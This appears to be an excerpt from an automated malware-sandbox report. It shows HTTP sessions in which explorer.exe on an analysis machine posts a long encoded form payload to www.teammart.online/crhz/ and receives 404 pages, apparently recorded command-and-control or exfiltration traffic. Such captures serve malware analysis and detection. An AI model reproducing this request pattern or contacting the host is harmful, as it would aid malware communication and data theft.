                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                Jan 30, 2023 14:52:48.741385937 CET157INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                Jan 30, 2023 14:52:48.741414070 CET158INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                Jan 30, 2023 14:52:48.741441965 CET160INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                Jan 30, 2023 14:52:48.741463900 CET160INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                11192.168.2.649728184.94.215.9180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:51.304053068 CET162OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.teammart.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.teammart.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.teammart.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 37 58 64 4b 6f 67 6e 31 44 77 57 69 48 66 64 69 65 7a 6a 6a 78 2d 38 38 69 4c 31 66 78 58 62 36 46 58 68 41 69 4b 6d 57 4e 4f 43 48 63 57 5a 75 62 37 69 54 54 4b 55 70 7e 53 46 65 71 69 6c 72 79 57 59 38 56 61 70 32 52 50 44 57 63 33 44 7a 6c 68 65 35 48 34 70 79 71 79 62 35 69 64 52 35 78 56 7a 51 6e 36 52 6a 32 7a 68 31 6a 65 31 53 4a 67 4a 53 42 49 28 76 4a 6f 43 6e 47 67 6e 76 65 47 7a 4e 7e 71 4e 74 4d 65 5a 6a 47 66 73 4b 75 35 61 74 47 62 67 6c 28 58 79 31 64 42 6d 39 50 5f 30 73 7e 56 42 41 6d 73 34 4e 30 30 43 42 71 38 36 70 43 6b 34 4a 5a 77 6c 46 78 4b 38 6a 37 6b 38 7a 58 78 6d 55 72 35 7e 70 41 6a 35 50 6f 6d 6e 31 56 4c 79 32 5a 54 4e 59 63 33 73 33 35 6b 64 4d 58 31 47 57 57 50 62 34 45 62 42 46 79 58 68 52 66 59 48 67 62 70 6a 43 58 32 35 5f 53 42 43 39 70 50 77 4e 46 4f 53 6c 45 48 42 49 64 6d 72 4b 62 41 74 47 46 56 72 45 58 6d 74 47 51 6a 58 49 63 6c 50 57 43 76 6b 49 79 46 69 61 69 61 34 64 68 55 43 72 70 54 4b 56 5a 6e 75 78 43 76 5a 6d 34 70 79 58 62 7a 48 2d 53 65 55 59 71 6c 38 57 28 72 70 6d 4c 5f 6a 71 65 78 5a 74 41 50 67 66 75 52 63 30 79 55 49 58 66 78 31 6e 34 6f 4a 30 37 4e 6e 5a 6d 74 76 34 6e 4e 6b 6a 31 6b 75 34 70 68 4e 4e 43 66 33 69 73 69 30 55 4a 6d 77 5f 37 4c 6c 50 65 70 46 53 47 61 32 78 51 76 4c 6e 6e 67 58 55 31 41 77 68 5a 54 55 65 56 69 71 38 49 68 57 55 4b 74 37 30 4b 6b 4b 32 4a 66 61 46 38 42 79 56 38 78 77 5a 59 49 45 78 32 46 48 44 68 5a 68 45 47 57 4a 39 61 7a 69 63 67 34 70 41 67 6c 45 57 45 38 50 6f 6e 44 6c 65 74 33 7e 32 58 76 71 4f 78 37 69 6c 52 73 74 30 37 6a 6d 6b 4d 68 76 7a 79 4b 39 32 73 45 67 37 56 54 36 54 38 2d 5a 2d 65 47 6e 56 39 51 75 4c 73 6e 51 34 4c 6c 69 62 30 51 62 31 75 53 38 63 30 33 76 59 67 52 7a 70 56 73 47 73 72 39 6d 59 76 76 6b 36 52 30 78 31 67 33 6b 41 71 6b 49 66 31 6c 65 6e 4b 4a 65 48 31 52 77 32 6b 45 71 77 69 6d 65 5f 5a 52 35 68 44 44 56 33 72 38 77 63 71 71 51 66 6f 69 37 72 66 42 65 4c 31 71 76 70 42 51 7e 74 61 72 79 75 31 6b 5a 59 4d 52 4f 67 39 4d 36 52 49 45 78 4f 66 36 6d 57 76 70 69 74 31 74 30 48 56 38 77 39 45 4c 71 6a 44 6c 6f 56 32 4e 35 42 64 44 5a 39 5a 43 4b 68 6d 32 50 6e 7a 77 4e 54 4e 2d 34 4b 4c 43 73 2d 52 56 6e 6d 63 51 49 39 4b 56 32 44 36 44 35 35 4c 6b 6f 4a 6b 76 6e 43 77 68 73 79 65 32 30 43 36 48 50 63 62 55 6f 38 46 61 28 41 41 5f 4b 6f 55 52 33 37 56 75 4f 5a 4d 34 6a 66 65 70 6b 70 66 46 58 50 70 42 4e 74 46 4e 31 38 50 77 54 72 30 50 72 62 30 5f 79 46 75 77 5a 43 30 74 57 34 71 74 49 4a 4f 46 67 46 56 73 6c 79 56 4a 56 45 52 41 33 59 4f 37 59 53 52 6f 75 6b 56 57 43 6e 28 36 49 72 32 4d 6d 69 7e 77 50 53 51 75 39 79 4b 66 48 2d 53 51 74 6c 30 36 69 6f 5a 44 31 5a 77 49 28 38 53 62 65 75 58 49 6c 59 79 78 79 73 4e 63 53 53 53 7a 7a 43 55 4a 7a 37 48 63 37 30 57 49 36 6a 30 59 47 55 36 66 58 77 57 67 6e 2d 57 5a 46 2d 49 63 31 4f 6b 6f 7e 41 56 73 39 56 78 5f 68 69 39 7a 51 76 32 6a 75 4b 33 78 74 5a 72 33 66 70 65 46 31 70 55 46 62 57 6c 38 79 69 42 48 30 6d 48 34 31 41 4d 56 53 48 57 6e 4f 2d 78 69 35 41 79 76 59 4f 78 6f 78 32 4e 42 31 44 68 43 75 33 76 6c 67 37 6d 6d 5a 68 57 70 79 46 62 6f 76 50 70 53 44 78 32 55 45 6e 61 31 63 63 6e 52 49 54 57 5f 57 57 41 7a 43 53 49 39 50 4d 63 6b 41 66 53 78 53 51 31 57 63 79 6c 6f 47 78 58 65 4a 41 58 36 39 41 48 34 41 4b 6b 59 65 70 28 30 7a 32 7e 64 6a 4d 4e 44 5a 4e 6d 35 69 52 57 7a 62 30 61 2d 7a 53 57 56 78 76 50 39 79 34 7e 71 61 6e 61 61 73 77 54 74 76 58 4d 67 6f 6f 51 63 59 45 31 66 48 37 6c 79 7e 4f 28 78 37 46 65 4a 36 6c 7e 41 43 45 48 69 45 4a 74 69 5a 43 32 50 63 6d 7e 61 58 30 78 47 62 55 34 76 73 55 48 62 6c 53 5a 49 77 5f 57 65 35 6e 45 52 59 51 28 6f 79 4e 66 78 4d 6a 66 5f 50 58 6a 56 4a 54 71 6f 38 6f 6d 78 59 62 42 72 4c 38 63 37 47 59 36 63 35 45 37 77 6f 77 56 79 79 48 31 46 75 71 71 6d 36 57 30 31 78 53 64 39 33 70 39 76 4a 44 61 33 54 7a 70 63 73 46 4e 6a 51 79 28 5f 49 5f 61 51 54 55 44 39 30 79 4e 68 61 73 59 63 7e 4b 39 4b 64 6d 4c 43 44 30 30 6c 71 59 62 58 52 35 58 43 6b 34 43 4b 32 32 28 70 78 5a 46 70 4e 71 6a 41 57 47 38 42 38 4a 31 4e 79 79 6c 68 79 69 71 73 73 4f 6c
                                                                Data Ascii: ghJ5T=1bSqDFR5OvcN7XdKogn1DwWiHfdiezjjx-88iL1fxXb6FXhAiKmWNOCHcWZub7iTTKUp~SFeqilryWY8Vap2RPDWc3Dzlhe5H4pyqyb5idR5xVzQn6Rj2zh1je1SJgJSBI(vJoCnGgnveGzN~qNtMeZjGfsKu5atGbgl(Xy1dBm9P_0s~VBAms4N00CBq86pCk4JZwlFxK8j7k8zXxmUr5~pAj5Pomn1VLy2ZTNYc3s35kdMX1GWWPb4EbBFyXhRfYHgbpjCX25_SBC9pPwNFOSlEHBIdmrKbAtGFVrEXmtGQjXIclPWCvkIyFiaia4dhUCrpTKVZnuxCvZm4pyXbzH-SeUYql8W(rpmL_jqexZtAPgfuRc0yUIXfx1n4oJ07NnZmtv4nNkj1ku4phNNCf3isi0UJmw_7LlPepFSGa2xQvLnngXU1AwhZTUeViq8IhWUKt70KkK2JfaF8ByV8xwZYIEx2FHDhZhEGWJ9azicg4pAglEWE8PonDlet3~2XvqOx7ilRst07jmkMhvzyK92sEg7VT6T8-Z-eGnV9QuLsnQ4Llib0Qb1uS8c03vYgRzpVsGsr9mYvvk6R0x1g3kAqkIf1lenKJeH1Rw2kEqwime_ZR5hDDV3r8wcqqQfoi7rfBeL1qvpBQ~taryu1kZYMROg9M6RIExOf6mWvpit1t0HV8w9ELqjDloV2N5BdDZ9ZCKhm2PnzwNTN-4KLCs-RVnmcQI9KV2D6D55LkoJkvnCwhsye20C6HPcbUo8Fa(AA_KoUR37VuOZM4jfepkpfFXPpBNtFN18PwTr0Prb0_yFuwZC0tW4qtIJOFgFVslyVJVERA3YO7YSRoukVWCn(6Ir2Mmi~wPSQu9yKfH-SQtl06ioZD1ZwI(8SbeuXIlYyxysNcSSSzzCUJz7Hc70WI6j0YGU6fXwWgn-WZF-Ic1Oko~AVs9Vx_hi9zQv2juK3xtZr3fpeF1pUFbWl8yiBH0mH41AMVSHWnO-xi5AyvYOxox2NB1DhCu3vlg7mmZhWpyFbovPpSDx2UEna1ccnRITW_WWAzCSI9PMckAfSxSQ1WcyloGxXeJAX69AH4AKkYep(0z2~djMNDZNm5iRWzb0a-zSWVxvP9y4~qanaaswTtvXMgooQcYE1fH7ly~O(x7FeJ6l~ACEHiEJtiZC2Pcm~aX0xGbU4vsUHblSZIw_We5nERYQ(oyNfxMjf_PXjVJTqo8omxYbBrL8c7GY6c5E7wowVyyH1Fuqqm6W01xSd93p9vJDa3TzpcsFNjQy(_I_aQTUD90yNhasYc~K9KdmLCD00lqYbXR5XCk4CK22(pxZFpNqjAWG8B8J1NyylhyiqssOlmQmTXw5FdXyuMz6EyMYWCHX0ur3XK5HwKi-5K6VZjAiNndIr8OT1z6Q(6aml_s93hQh7_NxQ_OYWDCI(Uo9fzeYBqY.
                                                                Jan 30, 2023 14:52:51.578947067 CET164INHTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:52:51 GMT
                                                                Server: Apache
                                                                Content-Length: 5278
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                Jan 30, 2023 14:52:51.578978062 CET165INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                Jan 30, 2023 14:52:51.578998089 CET166INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                Jan 30, 2023 14:52:51.579137087 CET168INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                Jan 30, 2023 14:52:51.579185963 CET168INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                12192.168.2.649729184.94.215.9180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
